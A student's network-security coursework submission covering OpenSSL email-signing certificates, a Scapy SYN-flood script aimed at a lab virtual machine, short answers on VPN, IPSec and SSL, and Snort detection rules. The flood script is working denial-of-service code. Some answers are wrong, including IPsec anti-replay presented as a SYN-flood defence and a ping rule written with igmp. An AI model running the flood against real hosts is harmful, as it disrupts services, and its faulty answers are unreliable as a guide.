Coursework Submission Exercise 1: E-Mail Signing
1.1 A complete list of OpenSSL commands
a). generate RSA private key
openssl genrsa -out mail.key 2048
– genrsa : use RSA algorithm.
– -out mail.key 2048 : the private key name is mail.key and its length is 2048 bits.
b). generate signing certificate csr file
openssl req -new -key mail.key -out mail.csr -config ../ca/openssl.cnf
– key mail.key
– -out mail.csr
– config ../ca/openssl.cnf
: private key
: output csr file name
: the configure file that openssl use
c). generate signing certificate
openssl ca -in mail.csr -out mail.crt -cert ../ca/ca.crt -keyfile ../ca/ca.key – config ../ca/openssl.cnf -extensions v3_req
– -in mail.csr
– -out mail.crt
– -cert ../ca/ca.crt
– -keyfile ../ca/ca.key
– -config ../ca/openssl.cnf – -extensions v3_req
: signing certificate csr file
: output signing certificate file name
: Certification Authority certificate
: Certification Authority private key
: the configure file that openssl use
: extension information of signing certificate
d). check the mail signing certificate content
openssl x509 -in mail.crt -noout -text
– -in mail.crt : the signing certificate that need to be check – -noout -text : the output format
1.2 The certificate description
Certificate: Data:
Version: 3 (0x2)
Serial Number: 4096 (0x1000)
Signature Algorithm: sha256WithRSAEncryption
Validity
Not Before: Jan 7 15:07:34 2019 GMT Not After : Jan 7 15:07:34 2020 GMT
Subject: C=GB, ST=Surrey, CN=COMM048_STUDENT
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
Public-Key: (2048 bit) Modulus:
O=COMM048 Ltd,
00:b3:ce:8f:36:d4:c9:24:d8:a2:8a:fd:8d:25:6d: 3a:aa:ca:42:41:03:b7:30:b9:a6:00:ab:14:d5:70: 0e:e2:77:d8:a0:20:ea:3f:5a:31:7a:bd:7c:c0:86: b0:7a:6d:ea:05:98:e0:dc:c0:79:cf:59:4b:ce:20: 64:7c:85:bb:2b:b6:2c:49:50:42:b0:48:05:22:a2: dc:c1:f0:40:ce:a6:19:71:10:65:42:52:07:e7:4a: f7:b9:d2:e6:70:67:ea:16:80:41:a1:b0:f2:2f:40: 7c:8b:c4:3b:86:99:08:13:88:fd:c9:ea:5e:3e:bb: 04:eb:02:8e:7a:2c:ab:78:02:6c:7a:b0:a9:01:14: b6:18:d3:4f:ec:49:01:4d:18:73:8c:ef:0c:1e:73: cd:92:f0:8c:66:9c:b2:ff:b9:9c:4c:88:f5:0f:0d: 79:63:e2:ac:00:fc:56:44:ac:28:c5:aa:58:5e:fd: 1f:c0:4c:a1:1a:35:e0:30:b5:6f:65:e8:08:da:12: 1c:5d:3d:98:70:71:02:06:94:7c:29:87:f1:f1:ee: 14:c6:2d:7e:00:48:ef:9a:29:a7:b3:8a:fb:8c:86: d4:5d:84:e2:d0:53:fb:9e:74:4d:e0:6c:19:b0:7a: 06:c8:6a:ad:ba:b6:74:64:76:16:19:41:20:2f:c1: 4f:9f
Exponent: 65537 (0x10001) X509v3 extensions:
X509v3 Basic Constraints: CA:FALSE
X509v3 Key Usage:
Digital Signature, Non Repudiation, Key Encipherment
X509v3 Subject Alternative Name: email:gyf13723086336@gmail.com
Signature Algorithm: sha256WithRSAEncryption 14:85:f6:fc:d2:9d:f4:54:21:d9:e3:1a:1c:cc:c2:a2:1e:f4: cd:9a:57:f0:42:62:21:91:2e:3a:e6:d1:78:55:35:69:94:51: aa:35:6a:9e:96:9e:df:3e:29:7b:6b:06:85:8d:81:ee:1d:93: 3e:37:3b:d6:1e:fe:92:da:3f:d5:a0:2a:c1:23:13:80:54:01: 2f:54:5c:d9:7a:cc:fe:8f:f2:c9:31:23:32:cd:19:f3:8e:bc: 21:b6:59:5d:86:b8:43:e4:36:61:89:00:5a:bf:53:54:b2:c1: 49:89:ca:50:ae:f2:c7:81:44:ca:e6:fe:f7:ea:d4:35:0c:66:
Issuer: C=GB, ST=Surrey, O=COMM048 Ltd, CN=COMM048_STUDENT
89:0f:13:38:e8:1b:9a:0d:ce:46:10:20:48:4b:a7:58:4f:e2: ba:ec:06:05:24:67:5a:6c:3f:ef:fa:92:64:6e:0a:3f:ac:25: e2:04:b9:6b:21:60:59:7f:16:9f:fd:cd:50:31:9b:84:3f:7c: 46:5c:f2:4f:f5:37:d7:53:10:7f:e1:ff:af:1b:cf:5d:16:48: be:0d:7b:8d:c8:94:61:b0:b7:43:7f:ff:81:c6:16:f5:bd:55: b5:a4:9a:21:34:9e:c7:7d:45:e8:c5:70:94:0d:06:f5:a1:18: 86:a1:a8:37
62:ab:5b:c9:63:e4:54:5b:7a:2d:76:43:c8:a6:b2:2b:7d:fa:
1.3 Steps taken to import the private key and certificate into your email
a). combine private key and signing certificate to a pks#12 certificate.
openssl pkcs12 -export -in mail.crt -inkey mail.key -nodes -out mail.p12
b). import CA certificate into thunderbird server.
c). import mail.p12 certificate into thunderbird server.
1.4 Screen Capture
Figure 1.1 certificate import
Exercise 2: SYN Flooding Attack
2.1 A SYN packet in Scapy
a). scapy send SYN packet command
sr1(IP(dst=”192.168.221.152″)/TCP(dport=80,flags=”S”))
b). wireshark capture result of the victim machine
Figure 2.1 SYN packet capture
2.2 A python script
Figure 2.2 SYN packet detail
The python script that can generate SYN flooding attack is as follows: syn_flood_attack.py
#!/usr/bin/python #coding=utf-8
from scapy.all import *
def synFlood():
for sport in range(49512, 65535):
IPlayer = IP(src=”192.168.*.*”, dst=”192.168.221.152″)
TCPlayer = TCP(sport=sport, dport=80) pkt = IPlayer / TCPlayer
send(pkt)
if __name__ == ‘__main__’: synFlood()
In attack virtual machine, run this python script. And in victim virtual machine, open wireshark and can see the result:
Figure 2.3 victim machine under syn flooding attack When we need to cancle the attack, input command ¡°Ctrl + Z¡±.
Exercise 3: VPN, IPSec, SSL and Kerberos
3.1 Virtual Private Network (VPN)
Compared to dedicated networks utilizing frame relay, leased lines, and traditional dial-up, benefits of VPNs are as follows:
a). VPN can enhance security.
b). VPN has a safe IP address. VPN is encrypted, users on the internet can only get the public IP address, can¡¯t get the internal private IP address.
c). VPN is easily to extend.
d). VPN supports most common protocols. e). VPN is cheaper than other methods.
3.2 TCP security, IPSec
a). How IPSec prevents SYN flooding attacks
To prevent DoS, the IPsec protocol uses a sliding window in which each packet is
assigned an ordinal number and only accepts new or existing packets that are not in the window. Old packets will be discarded immediately.
b). Consider the scenario
Yes, B’s IPsec implementation will notice that the packet is a duplicate and discard
it immediately.
3.3 Digital Certificates
A digital certificate is a file digitally signed by a certificate authority that contains public key owner information and public key. The RSA cryptographic algorithm is usually used to create a digital certificate.
3.4 SSL
a). Man-in-the-middle attack
The server authenticates to the requesting client, and the client authenticates to the
requesting server. Once the server verifies that the requesting client is untrustworthy, the server refuses to continue the communication. If the client finds that the server is untrustworthy, the communication is aborted.
b). Password sniffing
When using SSL, the user name and password will be first encrypted and then
transmitted over the Internet over an SSL connection, and no one can read or access the data that you transmit over that connection.
c). IP spoofing
This relies on digital certificate. After the user and the server connection is
established, the server will send the digital certificate and public key to the user, the user to generate the session key, using the public key to encrypt the session key, and then passed to the server, the server encrypted with the private key, in this way, client and server is established a secure channel, only SSL allows users to communicate with the server.
3.5 Kerberos
Figure 3.1 Kerberos
Exercise 4: Intrusion Detection Systems and Snort
4.1 Intrusion Detection Systems
a). Outline the components of an Intrusion Detection System (IDS)
IDS is consists of Event Generator, Event Analyzer, Response System, Event
Database.
b). Network-based and Host-based IDSs and their differences
Network-based IDSs: This kind of IDSs will connect to the Internet and capture
packets on the Internet, analyze whether it has a known attack pattern and identify whether it is an intruder.
Host-based IDSs: This kind of IDSs will analyze system audit data to find suspicious activities, such as memory and file changes. The input data is mainly from the audit log of the system, and generally it can only detect the intrusion on the host.
Differences:
1. The network-based IDSs can objectively reflect the network activity, especially the blind spot which can monitor the audit of the host system. The host-based IDSs allows for more precise monitoring of the various activities on the host.
2. The network-based IDSs is limited by the switched network and can only monitor the hosts at the same monitoring point, while the host-based IDSs can monitor all the hosts at the same monitoring point.
4.2 Writing Snort Rules
a). Create a snort rule that alerts for FTP connection from any IP address different from Home_Net
alert tcp !$HOME_NET any -> any any (msg: ¡°ftp connection¡±; metadata: service ftp;)
b). Create a snort rule that alerts for worm in content outgoing from Home_Net
alert tcp $HOME_NET any -> any any (msg: ¡°worm¡±; content: ¡°worm¡±;)
c). Answer
Yes, it will raise an alert when a Google search for Internet Worm is executed from
Home_Net. That is because a http request packet has ¡°worm¡± in its content field. d). Create a snort rule that alerts for pings from External_Net
alter ip $External_Net any -> any any (ip_proto: igmp)
4.3 Snort Rules
a). alert tcp any any -> 10.1.1.0/24 6000:6010 (msg: “X Windows Service traffic”;) For tcp connections that destination IP address subnet mask is 10.1.1.0/24 and destination port is between 6000 and 6010, Snort will display the alert message ¡°X
Windows Service traffic¡±.
b). alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:”SCAN FIN”; flags: F; reference:arachnids,27;)
For tcp connections that source IP address is $ EXTERNAL_NET and destination IP address is $HOME_NET, tcp flags is ¡°F¡±, tcp reference is ¡°arachnids,27¡±, Snort will display the alert message ¡°SCAN FIN¡±.
c). alert tcp $HOME_NET 23 -> $EXTERNAL_NET any (msg:”TELNET login incorrect”; content:”Login incorrect”; flags: A+; reference:arachnids,127;)
For tcp connections that source IP address is $HOME_NET, source port is 23,
destination IP address is $EXTERNAL_NET, tcp content is ¡°Login incorrect¡±, tcp flags is ¡°A+¡±, tcp reference is ¡°arachnids,127¡±, Snort will display the alert message ¡°TELNET login incorrect¡±.
d). alert icmp any any -> any any (msg:”ICMP Source Quench”; itype: 4; icode:0;) For any ICMP connections, icmp itype is 4 and icode is 0, Snort will display the
alert message ¡°ICMP Source Quench¡±.
4.4 A Computer Worm
alter udp $External_Net any -> $Home_Net 1434 (msg: ¡°Internet Worm to be stopped¡±; content: ¡°07¡±; content: ¡°71 f2 03 01 04 9b 71 f2 01¡±; content: ¡°tire¡±)